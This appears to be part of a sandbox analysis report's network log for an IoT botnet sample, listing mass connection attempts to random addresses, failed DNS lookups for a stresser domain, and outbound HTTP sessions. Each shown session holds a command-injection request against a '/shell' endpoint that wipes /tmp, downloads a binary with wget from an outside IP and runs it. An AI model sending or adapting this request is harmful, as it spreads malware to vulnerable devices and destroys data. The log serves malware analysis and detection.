                                                          Dec 3, 2024 23:16:52.728049040 CET4060223192.168.2.23126.80.223.243
                                                          Dec 3, 2024 23:16:52.728049994 CET4060223192.168.2.2357.178.148.44
                                                          Dec 3, 2024 23:16:52.728049040 CET4060223192.168.2.23161.205.32.204
                                                          Dec 3, 2024 23:16:52.728049040 CET4060223192.168.2.23222.122.104.128
                                                          Dec 3, 2024 23:16:52.728049994 CET4060223192.168.2.2369.252.38.64
                                                          Dec 3, 2024 23:16:52.728049040 CET4060223192.168.2.2312.75.251.244
                                                          Dec 3, 2024 23:16:52.728049040 CET4060223192.168.2.2312.111.63.254
                                                          Dec 3, 2024 23:16:52.728049994 CET4060223192.168.2.2350.187.150.101
                                                          Dec 3, 2024 23:16:52.728049994 CET4060223192.168.2.23189.102.93.231
                                                          Dec 3, 2024 23:16:52.728063107 CET4060223192.168.2.23125.179.170.186
                                                          Dec 3, 2024 23:16:52.728064060 CET4060223192.168.2.23100.128.201.200
                                                          Dec 3, 2024 23:16:52.728064060 CET4060223192.168.2.23212.21.47.56
                                                          Dec 3, 2024 23:16:52.728064060 CET4060223192.168.2.23199.246.176.144
                                                          Dec 3, 2024 23:16:52.728068113 CET4060223192.168.2.23130.234.99.119
                                                          Dec 3, 2024 23:16:52.728068113 CET4060223192.168.2.2346.244.38.228
                                                          Dec 3, 2024 23:16:52.728068113 CET4060223192.168.2.23152.153.129.36
                                                          Dec 3, 2024 23:16:52.728068113 CET4060223192.168.2.2394.57.170.210
                                                          Dec 3, 2024 23:16:52.728068113 CET4060223192.168.2.23209.114.192.229
                                                          Dec 3, 2024 23:16:52.728080988 CET4060223192.168.2.23168.21.109.200
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.2375.69.182.119
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.23156.47.149.11
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.23135.30.16.105
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.2361.226.147.157
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.23132.156.229.3
                                                          Dec 3, 2024 23:16:52.728082895 CET4060223192.168.2.2314.141.58.132
                                                          Dec 3, 2024 23:16:52.728085041 CET4060223192.168.2.23118.192.139.117
                                                          Dec 3, 2024 23:16:52.728085041 CET4060223192.168.2.23190.206.94.140
                                                          Dec 3, 2024 23:16:52.728096962 CET4060223192.168.2.2369.78.4.226
                                                          Dec 3, 2024 23:16:52.728097916 CET4060223192.168.2.23136.147.105.14
                                                          Dec 3, 2024 23:16:52.728097916 CET4060223192.168.2.2341.13.200.91
                                                          Dec 3, 2024 23:16:52.728099108 CET4060223192.168.2.2339.123.170.184
                                                          Dec 3, 2024 23:16:52.728099108 CET4060223192.168.2.23129.150.183.185
                                                          Dec 3, 2024 23:16:52.728102922 CET4060223192.168.2.23190.168.134.169
                                                          Dec 3, 2024 23:16:52.728102922 CET4060223192.168.2.23114.155.52.184
                                                          Dec 3, 2024 23:16:52.728115082 CET4060223192.168.2.23120.24.252.130
                                                          Dec 3, 2024 23:16:52.728115082 CET4060223192.168.2.2377.87.137.190
                                                          Dec 3, 2024 23:16:52.728115082 CET4060223192.168.2.2371.101.190.253
                                                          Dec 3, 2024 23:16:52.728115082 CET4060223192.168.2.23157.218.3.136
                                                          Dec 3, 2024 23:16:52.728115082 CET4060223192.168.2.23174.14.223.179
                                                          Dec 3, 2024 23:16:52.728116035 CET4060223192.168.2.23148.175.124.70
                                                          Dec 3, 2024 23:16:52.728118896 CET4060223192.168.2.23202.54.122.153
                                                          Dec 3, 2024 23:16:52.728121042 CET4060223192.168.2.2346.73.85.85
                                                          Dec 3, 2024 23:16:52.728121042 CET4060223192.168.2.23168.243.210.110
                                                          Dec 3, 2024 23:16:52.728137016 CET4060223192.168.2.23163.148.216.108
                                                          Dec 3, 2024 23:16:52.728137970 CET4060223192.168.2.23194.149.47.127
                                                          Dec 3, 2024 23:16:52.728137970 CET4060223192.168.2.23125.57.228.165
                                                          Dec 3, 2024 23:16:52.728137970 CET4060223192.168.2.23167.182.172.211
                                                          Dec 3, 2024 23:16:52.728137970 CET4060223192.168.2.2385.126.170.51
                                                          Dec 3, 2024 23:16:52.728137970 CET4060223192.168.2.23174.18.113.43
                                                          Dec 3, 2024 23:16:52.728140116 CET4060223192.168.2.2342.6.96.3
                                                          Dec 3, 2024 23:16:52.728141069 CET4060223192.168.2.23110.62.144.61
                                                          Dec 3, 2024 23:16:52.728140116 CET4060223192.168.2.2367.58.219.160
                                                          Dec 3, 2024 23:16:52.728140116 CET4060223192.168.2.2367.60.42.162
                                                          Dec 3, 2024 23:16:52.728140116 CET4060223192.168.2.2393.216.104.178
                                                          Dec 3, 2024 23:16:52.728141069 CET4060223192.168.2.2360.233.186.14
                                                          Dec 3, 2024 23:16:52.728141069 CET4060223192.168.2.2387.173.26.121
                                                          Dec 3, 2024 23:16:52.728149891 CET4060223192.168.2.23161.179.188.81
                                                          Dec 3, 2024 23:16:52.728149891 CET4060223192.168.2.2346.82.12.131
                                                          Dec 3, 2024 23:16:52.728149891 CET4060223192.168.2.23198.123.123.197
                                                          Dec 3, 2024 23:16:52.728167057 CET4060223192.168.2.2318.183.199.85
                                                          Dec 3, 2024 23:16:52.728167057 CET4060223192.168.2.23148.254.74.176
                                                          Dec 3, 2024 23:16:52.728169918 CET4060223192.168.2.2364.17.25.144
                                                          Dec 3, 2024 23:16:52.728172064 CET4060223192.168.2.23187.112.178.160
                                                          Dec 3, 2024 23:16:52.728172064 CET4060223192.168.2.2392.234.137.5
                                                          Dec 3, 2024 23:16:52.728172064 CET4060223192.168.2.23126.168.178.136
                                                          Dec 3, 2024 23:16:52.728173018 CET4060223192.168.2.23133.46.50.26
                                                          Dec 3, 2024 23:16:52.728173971 CET4060223192.168.2.23158.100.200.26
                                                          Dec 3, 2024 23:16:52.728173971 CET4060223192.168.2.23125.170.197.66
                                                          Dec 3, 2024 23:16:52.728173971 CET4060223192.168.2.23169.138.72.125
                                                          Dec 3, 2024 23:16:52.728182077 CET4060223192.168.2.2352.103.96.104
                                                          Dec 3, 2024 23:16:52.728187084 CET4060223192.168.2.23137.134.58.168
                                                          Dec 3, 2024 23:16:52.728187084 CET4060223192.168.2.23115.245.164.10
                                                          Dec 3, 2024 23:16:52.728187084 CET4060223192.168.2.2385.232.24.86
                                                          Dec 3, 2024 23:16:52.728188992 CET4060223192.168.2.2375.194.149.106
                                                          Dec 3, 2024 23:16:52.728190899 CET4060223192.168.2.23139.160.172.1
                                                          Dec 3, 2024 23:16:52.728194952 CET4060223192.168.2.23217.111.96.47
                                                          Dec 3, 2024 23:16:52.728214979 CET4060223192.168.2.2397.228.39.164
                                                          Dec 3, 2024 23:16:52.728214979 CET4060223192.168.2.2346.241.38.165
                                                          Dec 3, 2024 23:16:52.728215933 CET4060223192.168.2.23210.237.68.245
                                                          Dec 3, 2024 23:16:52.728216887 CET4060223192.168.2.2358.95.178.107
                                                          Dec 3, 2024 23:16:52.728216887 CET4060223192.168.2.23107.208.35.177
                                                          Dec 3, 2024 23:16:52.728218079 CET4060223192.168.2.23173.216.197.108
                                                          Dec 3, 2024 23:16:52.728218079 CET4060223192.168.2.2373.122.4.151
                                                          Dec 3, 2024 23:16:52.728218079 CET4060223192.168.2.23195.79.163.129
                                                          Dec 3, 2024 23:16:52.728218079 CET4060223192.168.2.2312.52.107.81
                                                          Dec 3, 2024 23:16:52.728219032 CET4060223192.168.2.23188.138.95.214
                                                          Dec 3, 2024 23:16:52.728219986 CET4060223192.168.2.23211.129.1.239
                                                          Dec 3, 2024 23:16:52.728219032 CET4060223192.168.2.23154.109.16.73
                                                          Dec 3, 2024 23:16:52.728219032 CET4060223192.168.2.2394.213.210.60
                                                          Dec 3, 2024 23:16:52.728219032 CET4060223192.168.2.23216.177.113.221
                                                          Dec 3, 2024 23:16:52.728221893 CET4060223192.168.2.23137.106.175.183
                                                          Dec 3, 2024 23:16:52.728219032 CET4060223192.168.2.23112.41.244.28
                                                          Dec 3, 2024 23:16:52.728221893 CET4060223192.168.2.2397.150.19.52
                                                          Dec 3, 2024 23:16:52.728221893 CET4060223192.168.2.23188.76.42.217
                                                          Dec 3, 2024 23:16:52.728234053 CET4060223192.168.2.2340.188.23.6
                                                          Dec 3, 2024 23:16:52.728234053 CET4060223192.168.2.2389.7.234.31
                                                          Dec 3, 2024 23:16:52.728235006 CET4060223192.168.2.23183.69.168.6
                                                          Dec 3, 2024 23:16:52.728241920 CET4060223192.168.2.2365.67.116.77
                                                          Dec 3, 2024 23:16:52.728241920 CET4060223192.168.2.23121.85.32.50
                                                          Dec 3, 2024 23:16:52.728241920 CET4060223192.168.2.23152.233.109.106
                                                          Dec 3, 2024 23:16:52.728243113 CET4060223192.168.2.2374.76.224.144
                                                          Dec 3, 2024 23:16:52.728243113 CET4060223192.168.2.23130.48.175.109
                                                          Dec 3, 2024 23:16:52.728244066 CET4060223192.168.2.23166.127.255.0
                                                          Dec 3, 2024 23:16:52.728244066 CET4060223192.168.2.23193.48.92.202
                                                          Dec 3, 2024 23:16:52.728244066 CET4060223192.168.2.2337.110.193.166
                                                          Dec 3, 2024 23:16:52.728245974 CET4060223192.168.2.2368.254.14.103
                                                          Dec 3, 2024 23:16:52.728244066 CET4060223192.168.2.2397.197.18.67
                                                          Dec 3, 2024 23:16:52.728245020 CET4060223192.168.2.23189.145.11.17
                                                          Dec 3, 2024 23:16:52.728246927 CET4060223192.168.2.23222.212.236.156
                                                          Dec 3, 2024 23:16:52.728244066 CET4060223192.168.2.23174.223.122.29
                                                          Dec 3, 2024 23:16:52.728246927 CET4060223192.168.2.2319.65.227.65
                                                          Dec 3, 2024 23:16:52.728266954 CET4060223192.168.2.23180.79.248.147
                                                          Dec 3, 2024 23:16:52.728266954 CET4060223192.168.2.2343.54.164.235
                                                          Dec 3, 2024 23:16:52.728266954 CET4060223192.168.2.23153.9.33.17
                                                          Dec 3, 2024 23:16:52.728266954 CET4060223192.168.2.23116.253.148.64
                                                          Dec 3, 2024 23:16:52.728269100 CET4060223192.168.2.23172.184.52.16
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.2317.119.88.215
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.23142.19.186.198
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.23121.190.246.152
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.2318.225.185.146
                                                          Dec 3, 2024 23:16:52.728272915 CET4060223192.168.2.23154.244.8.253
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.23223.0.59.185
                                                          Dec 3, 2024 23:16:52.728270054 CET4060223192.168.2.23198.37.26.12
                                                          Dec 3, 2024 23:16:52.728291988 CET4060223192.168.2.2357.169.3.115
                                                          Dec 3, 2024 23:16:52.728291988 CET4060223192.168.2.23136.18.122.223
                                                          Dec 3, 2024 23:16:52.728291988 CET4060223192.168.2.2341.69.60.208
                                                          Dec 3, 2024 23:16:52.728291988 CET4060223192.168.2.2353.168.236.139
                                                          Dec 3, 2024 23:16:52.728292942 CET4060223192.168.2.23167.208.109.239
                                                          Dec 3, 2024 23:16:52.728293896 CET4060223192.168.2.23131.110.166.95
                                                          Dec 3, 2024 23:16:52.728293896 CET4060223192.168.2.2394.151.190.49
                                                          Dec 3, 2024 23:16:52.728293896 CET4060223192.168.2.2399.71.168.189
                                                          Dec 3, 2024 23:16:52.728293896 CET4060223192.168.2.23219.171.164.135
                                                          Dec 3, 2024 23:16:52.728296041 CET4060223192.168.2.23217.174.138.189
                                                          Dec 3, 2024 23:16:52.728300095 CET4060223192.168.2.2391.204.244.136
                                                          Dec 3, 2024 23:16:52.728300095 CET4060223192.168.2.23100.59.212.77
                                                          Dec 3, 2024 23:16:52.728300095 CET4060223192.168.2.2325.81.133.21
                                                          Dec 3, 2024 23:16:52.728300095 CET4060223192.168.2.23170.35.34.212
                                                          Dec 3, 2024 23:16:52.728300095 CET4060223192.168.2.23208.225.243.147
                                                          Dec 3, 2024 23:16:52.728306055 CET4060223192.168.2.23150.80.144.108
                                                          Dec 3, 2024 23:16:52.728306055 CET4060223192.168.2.2384.137.162.25
                                                          Dec 3, 2024 23:16:52.728306055 CET4060223192.168.2.23121.156.14.74
                                                          Dec 3, 2024 23:16:52.728323936 CET4060223192.168.2.2382.83.171.127
                                                          Dec 3, 2024 23:16:52.728323936 CET4060223192.168.2.2313.106.89.53
                                                          Dec 3, 2024 23:16:52.728324890 CET4060223192.168.2.23117.173.163.111
                                                          Dec 3, 2024 23:16:52.728324890 CET4060223192.168.2.23223.60.212.78
                                                          Dec 3, 2024 23:16:52.728326082 CET4060223192.168.2.2367.223.128.251
                                                          Dec 3, 2024 23:16:52.728326082 CET4060223192.168.2.2312.199.214.86
                                                          Dec 3, 2024 23:16:52.728326082 CET4060223192.168.2.23152.144.84.47
                                                          Dec 3, 2024 23:16:52.728327036 CET4060223192.168.2.23114.158.199.66
                                                          Dec 3, 2024 23:16:52.728327990 CET4060223192.168.2.2382.90.87.31
                                                          Dec 3, 2024 23:16:52.728327990 CET4060223192.168.2.2341.178.152.227
                                                          Dec 3, 2024 23:16:52.728338957 CET4060223192.168.2.23120.16.57.78
                                                          Dec 3, 2024 23:16:52.728338957 CET4060223192.168.2.23133.176.237.8
                                                          Dec 3, 2024 23:16:52.728338957 CET4060223192.168.2.23177.250.96.238
                                                          Dec 3, 2024 23:16:52.728354931 CET4060223192.168.2.23145.127.150.161
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.23216.184.144.220
                                                          Dec 3, 2024 23:16:52.728354931 CET4060223192.168.2.2352.9.45.110
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.2343.65.64.151
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.23116.33.121.74
                                                          Dec 3, 2024 23:16:52.728354931 CET4060223192.168.2.23211.48.12.239
                                                          Dec 3, 2024 23:16:52.728357077 CET4060223192.168.2.23213.4.109.81
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.23186.74.53.103
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.23173.24.15.242
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.23109.238.199.111
                                                          Dec 3, 2024 23:16:52.728357077 CET4060223192.168.2.23205.76.111.231
                                                          Dec 3, 2024 23:16:52.728355885 CET4060223192.168.2.2339.140.204.41
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.23168.204.174.195
                                                          Dec 3, 2024 23:16:52.728357077 CET4060223192.168.2.23119.156.19.235
                                                          Dec 3, 2024 23:16:52.728354931 CET4060223192.168.2.23123.187.47.74
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.23175.0.2.150
                                                          Dec 3, 2024 23:16:52.728357077 CET4060223192.168.2.23172.50.230.154
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.23184.62.204.114
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.23183.230.212.210
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.2317.54.164.167
                                                          Dec 3, 2024 23:16:52.728358030 CET4060223192.168.2.2378.183.233.196
                                                          Dec 3, 2024 23:16:52.728372097 CET4060223192.168.2.23105.90.18.28
                                                          Dec 3, 2024 23:16:52.728374004 CET4060223192.168.2.23123.244.10.1
                                                          Dec 3, 2024 23:16:52.728374004 CET4060223192.168.2.23109.69.94.182
                                                          Dec 3, 2024 23:16:52.728374004 CET4060223192.168.2.2341.97.205.19
                                                          Dec 3, 2024 23:16:52.728375912 CET4060223192.168.2.238.115.171.210
                                                          Dec 3, 2024 23:16:52.728375912 CET4060223192.168.2.23204.218.33.215
                                                          Dec 3, 2024 23:16:52.728375912 CET4060223192.168.2.2324.106.26.92
                                                          Dec 3, 2024 23:16:52.728375912 CET4060223192.168.2.23172.84.113.20
                                                          Dec 3, 2024 23:16:52.728380919 CET4060223192.168.2.23144.133.129.213
                                                          Dec 3, 2024 23:16:52.728387117 CET4060223192.168.2.23158.18.130.117
                                                          Dec 3, 2024 23:16:52.728387117 CET4060223192.168.2.2345.186.17.253
                                                          Dec 3, 2024 23:16:52.728387117 CET4060223192.168.2.2377.182.4.159
                                                          Dec 3, 2024 23:16:52.728389025 CET4060223192.168.2.2370.116.64.210
                                                          Dec 3, 2024 23:16:52.728389025 CET4060223192.168.2.23222.5.230.203
                                                          Dec 3, 2024 23:16:52.728394032 CET4060223192.168.2.23207.148.86.143
                                                          Dec 3, 2024 23:16:52.728394032 CET4060223192.168.2.2358.117.78.122
                                                          Dec 3, 2024 23:16:52.728395939 CET4060223192.168.2.23202.168.126.9
                                                          Dec 3, 2024 23:16:52.728398085 CET4060223192.168.2.23216.104.255.32
                                                          Dec 3, 2024 23:16:52.728398085 CET4060223192.168.2.2343.163.100.234
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 3, 2024 23:16:42.379096031 CET192.168.2.238.8.8.80xdecbStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:42.884453058 CET192.168.2.238.8.8.80xdecbStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:43.361428022 CET192.168.2.238.8.8.80xdecbStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:43.619426966 CET192.168.2.238.8.8.80xdecbStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:44.102360010 CET192.168.2.238.8.8.80xdecbStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:06.460330009 CET192.168.2.238.8.8.80xa051Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:06.715399981 CET192.168.2.238.8.8.80xa051Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:06.971559048 CET192.168.2.238.8.8.80xa051Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:07.228099108 CET192.168.2.238.8.8.80xa051Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:07.483628988 CET192.168.2.238.8.8.80xa051Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:29.779501915 CET192.168.2.238.8.8.80xbfcStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.036083937 CET192.168.2.238.8.8.80xbfcStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.288331032 CET192.168.2.238.8.8.80xbfcStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.542877913 CET192.168.2.238.8.8.80xbfcStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.800067902 CET192.168.2.238.8.8.80xbfcStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:53.233088970 CET192.168.2.238.8.8.80x8147Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:53.707308054 CET192.168.2.238.8.8.80x8147Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:53.962593079 CET192.168.2.238.8.8.80x8147Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:54.219116926 CET192.168.2.238.8.8.80x8147Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:54.474183083 CET192.168.2.238.8.8.80x8147Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:16.749186039 CET192.168.2.238.8.8.80x206Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:17.148588896 CET192.168.2.238.8.8.80x206Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:17.623954058 CET192.168.2.238.8.8.80x206Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:18.018352032 CET192.168.2.238.8.8.80x206Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:18.273323059 CET192.168.2.238.8.8.80x206Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:40.603188992 CET192.168.2.238.8.8.80x2e9bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:40.858592033 CET192.168.2.238.8.8.80x2e9bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.113920927 CET192.168.2.238.8.8.80x2e9bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.592536926 CET192.168.2.238.8.8.80x2e9bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.740958929 CET192.168.2.238.8.8.80x2e9bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 3, 2024 23:16:42.883223057 CET8.8.8.8192.168.2.230xdecbName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:43.360308886 CET8.8.8.8192.168.2.230xdecbName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:43.617417097 CET8.8.8.8192.168.2.230xdecbName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:44.101155996 CET8.8.8.8192.168.2.230xdecbName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:16:44.354609966 CET8.8.8.8192.168.2.230xdecbName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:06.714792013 CET8.8.8.8192.168.2.230xa051Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:06.970858097 CET8.8.8.8192.168.2.230xa051Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:07.227309942 CET8.8.8.8192.168.2.230xa051Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:07.483051062 CET8.8.8.8192.168.2.230xa051Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:07.735876083 CET8.8.8.8192.168.2.230xa051Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.035285950 CET8.8.8.8192.168.2.230xbfcName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.287818909 CET8.8.8.8192.168.2.230xbfcName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.542284012 CET8.8.8.8192.168.2.230xbfcName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:30.799510956 CET8.8.8.8192.168.2.230xbfcName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:31.193685055 CET8.8.8.8192.168.2.230xbfcName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:53.706741095 CET8.8.8.8192.168.2.230x8147Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:53.962003946 CET8.8.8.8192.168.2.230x8147Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:54.218367100 CET8.8.8.8192.168.2.230x8147Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:54.473653078 CET8.8.8.8192.168.2.230x8147Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:17:54.727694988 CET8.8.8.8192.168.2.230x8147Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:17.147933006 CET8.8.8.8192.168.2.230x206Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:17.623420954 CET8.8.8.8192.168.2.230x206Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:18.017810106 CET8.8.8.8192.168.2.230x206Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:18.272764921 CET8.8.8.8192.168.2.230x206Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:18.527029037 CET8.8.8.8192.168.2.230x206Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:40.857624054 CET8.8.8.8192.168.2.230x2e9bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.113234997 CET8.8.8.8192.168.2.230x2e9bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.591151953 CET8.8.8.8192.168.2.230x2e9bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:41.739954948 CET8.8.8.8192.168.2.230x2e9bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:18:42.135673046 CET8.8.8.8192.168.2.230x2e9bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          0192.168.2.2350594219.135.74.12480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.581548929 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192.168.2.233984289.7.20.13180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.582384109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192.168.2.233453451.51.22.880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.583009958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192.168.2.2355162144.38.20.080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.583667040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192.168.2.2347602101.46.179.1680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.584322929 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5192.168.2.2338240205.42.223.7680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.584978104 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6192.168.2.2354802131.246.4.6380
                                                          TimestampBytes transferredDirectionData
